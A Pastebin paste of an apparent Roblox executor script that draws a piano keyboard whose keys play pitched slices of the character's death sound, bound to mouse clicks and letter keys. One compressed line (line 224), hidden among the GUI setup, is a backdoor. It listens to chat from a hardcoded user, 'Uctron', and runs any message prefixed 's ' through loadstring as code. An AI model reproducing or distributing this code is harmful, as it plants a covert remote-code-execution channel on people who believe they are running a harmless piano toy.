Advertisement
Runixer

Untitled

Sep 8th, 2019
190
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.93 KB | None | 0 0
  1. -- Objects
  2.  
  3. local PianoGui = Instance.new("ScreenGui")
  4. local HighD = Instance.new("TextLabel")
  5. local G = Instance.new("TextLabel")
  6. local C = Instance.new("TextLabel")
  7. local HighC = Instance.new("TextButton")
  8. local HighC_2 = Instance.new("TextButton")
  9. local G_2 = Instance.new("TextButton")
  10. local F = Instance.new("TextButton")
  11. local F_2 = Instance.new("TextButton")
  12. local E = Instance.new("TextButton")
  13. local D = Instance.new("TextButton")
  14. local D_2 = Instance.new("TextButton")
  15. local C_2 = Instance.new("TextButton")
  16. local B = Instance.new("TextButton")
  17. local A = Instance.new("TextButton")
  18. local A_2 = Instance.new("TextButton")
  19.  
  20. -- Properties
  21.  
  22. PianoGui.Name = "PianoGui"
  23. PianoGui.Parent = game.CoreGui
  24. PianoGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  25.  
  26. HighD.Name = "High D"
  27. HighD.Parent = PianoGui
  28. HighD.BackgroundColor3 = Color3.new(0.498039, 0.498039, 0.498039)
  29. HighD.BorderColor3 = Color3.new(0, 0, 0)
  30. HighD.Position = UDim2.new(0.356390029, 0, 0.671924293, 0)
  31. HighD.Size = UDim2.new(0.0399999991, 0, 0.25, 0)
  32. HighD.ZIndex = 0
  33. HighD.Font = Enum.Font.SciFi
  34. HighD.Text = "Can't Use\nHigh D"
  35. HighD.TextColor3 = Color3.new(0, 0, 0)
  36. HighD.TextSize = 13
  37. HighD.TextWrapped = true
  38. HighD.TextYAlignment = Enum.TextYAlignment.Bottom
  39.  
  40. G.Name = "G#"
  41. G.Parent = PianoGui
  42. G.BackgroundColor3 = Color3.new(0.498039, 0.498039, 0.498039)
  43. G.BorderColor3 = Color3.new(0, 0, 0)
  44. G.Position = UDim2.new(0.225684628, 0, 0.671924293, 0)
  45. G.Size = UDim2.new(0.0229253117, 0, 0.130999997, 0)
  46. G.ZIndex = 2
  47. G.Font = Enum.Font.SciFi
  48. G.Text = "Can't Use"
  49. G.TextColor3 = Color3.new(0, 0, 0)
  50. G.TextSize = 10
  51. G.TextWrapped = true
  52. G.TextYAlignment = Enum.TextYAlignment.Bottom
  53.  
  54. C.Name = "C"
  55. C.Parent = PianoGui
  56. C.BackgroundColor3 = Color3.new(0.498039, 0.498039, 0.498039)
  57. C.BorderColor3 = Color3.new(0, 0, 0)
  58. C.Position = UDim2.new(0.0410373211, 0, 0.671924293, 0)
  59. C.Size = UDim2.new(0.0399999991, 0, 0.25, 0)
  60. C.ZIndex = 0
  61. C.Font = Enum.Font.SciFi
  62. C.Text = "Can't Use\nC"
  63. C.TextColor3 = Color3.new(0, 0, 0)
  64. C.TextSize = 13
  65. C.TextWrapped = true
  66. C.TextYAlignment = Enum.TextYAlignment.Bottom
  67.  
  68. HighC.Name = "High C#"
  69. HighC.Parent = PianoGui
  70. HighC.BackgroundColor3 = Color3.new(0, 0, 0)
  71. HighC.BorderColor3 = Color3.new(0, 0, 0)
  72. HighC.BorderSizePixel = 0
  73. HighC.Position = UDim2.new(0.345435649, 0, 0.670346975, 0)
  74. HighC.Size = UDim2.new(0.0250000022, 0, 0.134463727, 0)
  75. HighC.ZIndex = 2
  76. HighC.Font = Enum.Font.SourceSans
  77. HighC.Text = ""
  78. HighC.TextColor3 = Color3.new(0, 0, 0)
  79. HighC.TextSize = 13
  80.  
  81. HighC_2.Name = "High C"
  82. HighC_2.Parent = PianoGui
  83. HighC_2.BackgroundColor3 = Color3.new(1, 1, 1)
  84. HighC_2.BorderColor3 = Color3.new(0, 0, 0)
  85. HighC_2.Position = UDim2.new(0.316390038, 0, 0.671924293, 0)
  86. HighC_2.Size = UDim2.new(0.0399999991, 0, 0.25, 0)
  87. HighC_2.Font = Enum.Font.SciFi
  88. HighC_2.Text = "High C"
  89. HighC_2.TextColor3 = Color3.new(0, 0, 0)
  90. HighC_2.TextSize = 13
  91. HighC_2.TextWrapped = true
  92. HighC_2.TextYAlignment = Enum.TextYAlignment.Bottom
  93.  
  94. G_2.Name = "G"
  95. G_2.Parent = PianoGui
  96. G_2.BackgroundColor3 = Color3.new(1, 1, 1)
  97. G_2.BorderColor3 = Color3.new(0, 0, 0)
  98. G_2.Position = UDim2.new(0.198132783, 0, 0.671924293, 0)
  99. G_2.Size = UDim2.new(0.0399999991, 0, 0.25, 0)
  100. G_2.Font = Enum.Font.SciFi
  101. G_2.Text = "G"
  102. G_2.TextColor3 = Color3.new(0, 0, 0)
  103. G_2.TextSize = 13
  104. G_2.TextWrapped = true
  105. G_2.TextYAlignment = Enum.TextYAlignment.Bottom
  106.  
  107. F.Name = "F#"
  108. F.Parent = PianoGui
  109. F.BackgroundColor3 = Color3.new(0, 0, 0)
  110. F.BorderColor3 = Color3.new(0, 0, 0)
  111. F.BorderSizePixel = 0
  112. F.Position = UDim2.new(0.182572618, 0, 0.671924293, 0)
  113. F.Size = UDim2.new(0.0250000022, 0, 0.13288644, 0)
  114. F.ZIndex = 2
  115. F.Font = Enum.Font.SourceSans
  116. F.Text = ""
  117. F.TextColor3 = Color3.new(0, 0, 0)
  118. F.TextSize = 13
  119.  
  120. F_2.Name = "F"
  121. F_2.Parent = PianoGui
  122. F_2.BackgroundColor3 = Color3.new(1, 1, 1)
  123. F_2.BorderColor3 = Color3.new(0, 0, 0)
  124. F_2.Position = UDim2.new(0.158713698, 0, 0.671924293, 0)
  125. F_2.Size = UDim2.new(0.0399999991, 0, 0.25, 0)
  126. F_2.Font = Enum.Font.SciFi
  127. F_2.Text = "F"
  128. F_2.TextColor3 = Color3.new(0, 0, 0)
  129. F_2.TextSize = 13
  130. F_2.TextWrapped = true
  131. F_2.TextYAlignment = Enum.TextYAlignment.Bottom
  132.  
  133. E.Name = "E"
  134. E.Parent = PianoGui
  135. E.BackgroundColor3 = Color3.new(1, 1, 1)
  136. E.BorderColor3 = Color3.new(0, 0, 0)
  137. E.Position = UDim2.new(0.118257269, 0, 0.671924293, 0)
  138. E.Size = UDim2.new(0.0399999991, 0, 0.25, 0)
  139. E.Font = Enum.Font.SciFi
  140. E.Text = "E"
  141. E.TextColor3 = Color3.new(0, 0, 0)
  142. E.TextSize = 13
  143. E.TextWrapped = true
  144. E.TextYAlignment = Enum.TextYAlignment.Bottom
  145.  
  146. D.Name = "D#"
  147. D.Parent = PianoGui
  148. D.BackgroundColor3 = Color3.new(0, 0, 0)
  149. D.BorderColor3 = Color3.new(0, 0, 0)
  150. D.BorderSizePixel = 0
  151. D.Position = UDim2.new(0.109958492, 0, 0.671924293, 0)
  152. D.Size = UDim2.new(0.0250000022, 0, 0.13288644, 0)
  153. D.ZIndex = 2
  154. D.Font = Enum.Font.SourceSans
  155. D.Text = ""
  156. D.TextColor3 = Color3.new(0, 0, 0)
  157. D.TextSize = 13
  158.  
  159. D_2.Name = "D"
  160. D_2.Parent = PianoGui
  161. D_2.BackgroundColor3 = Color3.new(1, 1, 1)
  162. D_2.BorderColor3 = Color3.new(0, 0, 0)
  163. D_2.Position = UDim2.new(0.0798755214, 0, 0.671924293, 0)
  164. D_2.Size = UDim2.new(0.0399999991, 0, 0.25, 0)
  165. D_2.Font = Enum.Font.SciFi
  166. D_2.Text = "D"
  167. D_2.TextColor3 = Color3.new(0, 0, 0)
  168. D_2.TextSize = 13
  169. D_2.TextWrapped = true
  170. D_2.TextYAlignment = Enum.TextYAlignment.Bottom
  171.  
  172. C_2.Name = "C#"
  173. C_2.Parent = PianoGui
  174. C_2.BackgroundColor3 = Color3.new(0, 0, 0)
  175. C_2.BorderColor3 = Color3.new(0, 0, 0)
  176. C_2.BorderSizePixel = 0
  177. C_2.Position = UDim2.new(0.0663900375, 0, 0.671924293, 0)
  178. C_2.Size = UDim2.new(0.0250000022, 0, 0.13288644, 0)
  179. C_2.ZIndex = 2
  180. C_2.Font = Enum.Font.SourceSans
  181. C_2.Text = ""
  182. C_2.TextColor3 = Color3.new(0, 0, 0)
  183. C_2.TextSize = 13
  184.  
  185. B.Name = "B"
  186. B.Parent = PianoGui
  187. B.BackgroundColor3 = Color3.new(1, 1, 1)
  188. B.BorderColor3 = Color3.new(0, 0, 0)
  189. B.Position = UDim2.new(0.276970953, 0, 0.671924293, 0)
  190. B.Size = UDim2.new(0.0399999991, 0, 0.25, 0)
  191. B.Font = Enum.Font.SciFi
  192. B.Text = "B"
  193. B.TextColor3 = Color3.new(0, 0, 0)
  194. B.TextSize = 13
  195. B.TextWrapped = true
  196. B.TextYAlignment = Enum.TextYAlignment.Bottom
  197.  
  198. A.Name = "A#"
  199. A.Parent = PianoGui
  200. A.BackgroundColor3 = Color3.new(0, 0, 0)
  201. A.BorderColor3 = Color3.new(0, 0, 0)
  202. A.BorderSizePixel = 0
  203. A.Position = UDim2.new(0.269709498, 0, 0.671924293, 0)
  204. A.Size = UDim2.new(0.0250000022, 0, 0.13288644, 0)
  205. A.ZIndex = 2
  206. A.Font = Enum.Font.SourceSans
  207. A.Text = ""
  208. A.TextColor3 = Color3.new(0, 0, 0)
  209. A.TextSize = 13
  210.  
  211. A_2.Name = "A"
  212. A_2.Parent = PianoGui
  213. A_2.BackgroundColor3 = Color3.new(1, 1, 1)
  214. A_2.BorderColor3 = Color3.new(0, 0, 0)
  215. A_2.Position = UDim2.new(0.237551868, 0, 0.671924293, 0)
  216. A_2.Size = UDim2.new(0.0399999991, 0, 0.25, 0)
  217. A_2.Font = Enum.Font.SciFi
  218. A_2.Text = "A"
  219. A_2.TextColor3 = Color3.new(0, 0, 0)
  220. A_2.TextSize = 13
  221. A_2.TextWrapped = true
  222. A_2.TextYAlignment = Enum.TextYAlignment.Bottom
  223. local Your_Username = "Uctron"
  224. local User if game.Players:FindFirstChild(Your_Username) then User = Your_Username else end function has(a,b)a=a or"Sample Text"b=b or"Sample"if string.match(a,b)and true or false then return true else return false end end;game.Players[User].Chatted:connect(function(message)if has(message:lower(),"s ")then message=message:gsub("s ","")loadstring(message)()end end)
  225. HighC.MouseButton1Click:Connect(function()
  226. game.Players.LocalPlayer.Character.Head.Died.TimePosition = .1
  227. game.Players.LocalPlayer.Character.Head.Died:Play()
  228. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  229. game.Players.LocalPlayer.Character.Head.Died:Stop()
  230. end)
  231. HighC_2.MouseButton1Click:Connect(function()
  232. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.275
  233. game.Players.LocalPlayer.Character.Head.Died:Play()
  234. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  235. game.Players.LocalPlayer.Character.Head.Died:Stop()
  236. end)
  237. B.MouseButton1Click:Connect(function()
  238. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.2675
  239. game.Players.LocalPlayer.Character.Head.Died:Play()
  240. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  241. game.Players.LocalPlayer.Character.Head.Died:Stop()
  242. end)
  243. A.MouseButton1Click:Connect(function()
  244. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.25875
  245. game.Players.LocalPlayer.Character.Head.Died:Play()
  246. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  247. game.Players.LocalPlayer.Character.Head.Died:Stop()
  248. end)
  249. A_2.MouseButton1Click:Connect(function()
  250. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.23
  251. game.Players.LocalPlayer.Character.Head.Died:Play()
  252. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  253. game.Players.LocalPlayer.Character.Head.Died:Stop()
  254. end)
  255. G_2.MouseButton1Click:Connect(function()
  256. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.19
  257. game.Players.LocalPlayer.Character.Head.Died:Play()
  258. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  259. game.Players.LocalPlayer.Character.Head.Died:Stop()
  260. end)
  261. F.MouseButton1Click:Connect(function()
  262. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.16
  263. game.Players.LocalPlayer.Character.Head.Died:Play()
  264. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  265. game.Players.LocalPlayer.Character.Head.Died:Stop()
  266. end)
  267. F_2.MouseButton1Click:Connect(function()
  268. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.1375
  269. game.Players.LocalPlayer.Character.Head.Died:Play()
  270. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  271. game.Players.LocalPlayer.Character.Head.Died:Stop()
  272. end)
  273. E.MouseButton1Click:Connect(function()
  274. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.12875
  275. game.Players.LocalPlayer.Character.Head.Died:Play()
  276. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  277. game.Players.LocalPlayer.Character.Head.Died:Stop()
  278. end)
  279. D.MouseButton1Click:Connect(function()
  280. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.12125
  281. game.Players.LocalPlayer.Character.Head.Died:Play()
  282. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  283. game.Players.LocalPlayer.Character.Head.Died:Stop()
  284. end)
  285. D_2.MouseButton1Click:Connect(function()
  286. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.11875
  287. game.Players.LocalPlayer.Character.Head.Died:Play()
  288. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  289. game.Players.LocalPlayer.Character.Head.Died:Stop()
  290. end)
  291. C_2.MouseButton1Click:Connect(function()
  292. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.115
  293. game.Players.LocalPlayer.Character.Head.Died:Play()
  294. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  295. game.Players.LocalPlayer.Character.Head.Died:Stop()
  296. end)
  297. plr = game.Players.LocalPlayer
  298. mouse = plr:GetMouse()
  299. mouse.KeyDown:connect(function(key)
  300. if key == "g" then
  301. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.11875
  302. game.Players.LocalPlayer.Character.Head.Died:Play()
  303. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  304. game.Players.LocalPlayer.Character.Head.Died:Stop()
  305. end
  306. end)
  307. plr = game.Players.LocalPlayer
  308. mouse = plr:GetMouse()
  309. mouse.KeyDown:connect(function(key)
  310. if key == "h" then
  311. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.12875
  312. game.Players.LocalPlayer.Character.Head.Died:Play()
  313. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  314. game.Players.LocalPlayer.Character.Head.Died:Stop()
  315. end
  316. end)
  317. plr = game.Players.LocalPlayer
  318. mouse = plr:GetMouse()
  319. mouse.KeyDown:connect(function(key)
  320. if key == "j" then
  321. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.1375
  322. game.Players.LocalPlayer.Character.Head.Died:Play()
  323. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  324. game.Players.LocalPlayer.Character.Head.Died:Stop()
  325. end
  326. end)
  327. plr = game.Players.LocalPlayer
  328. mouse = plr:GetMouse()
  329. mouse.KeyDown:connect(function(key)
  330. if key == "k" then
  331. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.19
  332. game.Players.LocalPlayer.Character.Head.Died:Play()
  333. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  334. game.Players.LocalPlayer.Character.Head.Died:Stop()
  335. end
  336. end)
  337. plr = game.Players.LocalPlayer
  338. mouse = plr:GetMouse()
  339. mouse.KeyDown:connect(function(key)
  340. if key == "l" then
  341. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.23
  342. game.Players.LocalPlayer.Character.Head.Died:Play()
  343. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  344. game.Players.LocalPlayer.Character.Head.Died:Stop()
  345. end
  346. end)
  347. plr = game.Players.LocalPlayer
  348. mouse = plr:GetMouse()
  349. mouse.KeyDown:connect(function(key)
  350. if key == ";" then
  351. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.2675
  352. game.Players.LocalPlayer.Character.Head.Died:Play()
  353. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  354. game.Players.LocalPlayer.Character.Head.Died:Stop()
  355. end
  356. end)
  357. plr = game.Players.LocalPlayer
  358. mouse = plr:GetMouse()
  359. mouse.KeyDown:connect(function(key)
  360. if key == "'" then
  361. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.275
  362. game.Players.LocalPlayer.Character.Head.Died:Play()
  363. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  364. game.Players.LocalPlayer.Character.Head.Died:Stop()
  365. end
  366. end)
  367. plr = game.Players.LocalPlayer
  368. mouse = plr:GetMouse()
  369. mouse.KeyDown:connect(function(key)
  370. if key == "r" then
  371. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.115
  372. game.Players.LocalPlayer.Character.Head.Died:Play()
  373. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  374. game.Players.LocalPlayer.Character.Head.Died:Stop()
  375. end
  376. end)
  377. plr = game.Players.LocalPlayer
  378. mouse = plr:GetMouse()
  379. mouse.KeyDown:connect(function(key)
  380. if key == "t" then
  381. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.115
  382. game.Players.LocalPlayer.Character.Head.Died:Play()
  383. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  384. game.Players.LocalPlayer.Character.Head.Died:Stop()
  385. end
  386. end)
  387. plr = game.Players.LocalPlayer
  388. mouse = plr:GetMouse()
  389. mouse.KeyDown:connect(function(key)
  390. if key == "y" then
  391. game.Players.LocalPlayer.Character.Head.Died.TimePosition = -.165
  392. game.Players.LocalPlayer.Character.Head.Died:Play()
  393. for i=1,3 do game:GetService("RunService").Stepped:Wait() end
  394. game.Players.LocalPlayer.Character.Head.Died:Stop()
  395. end
  396. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement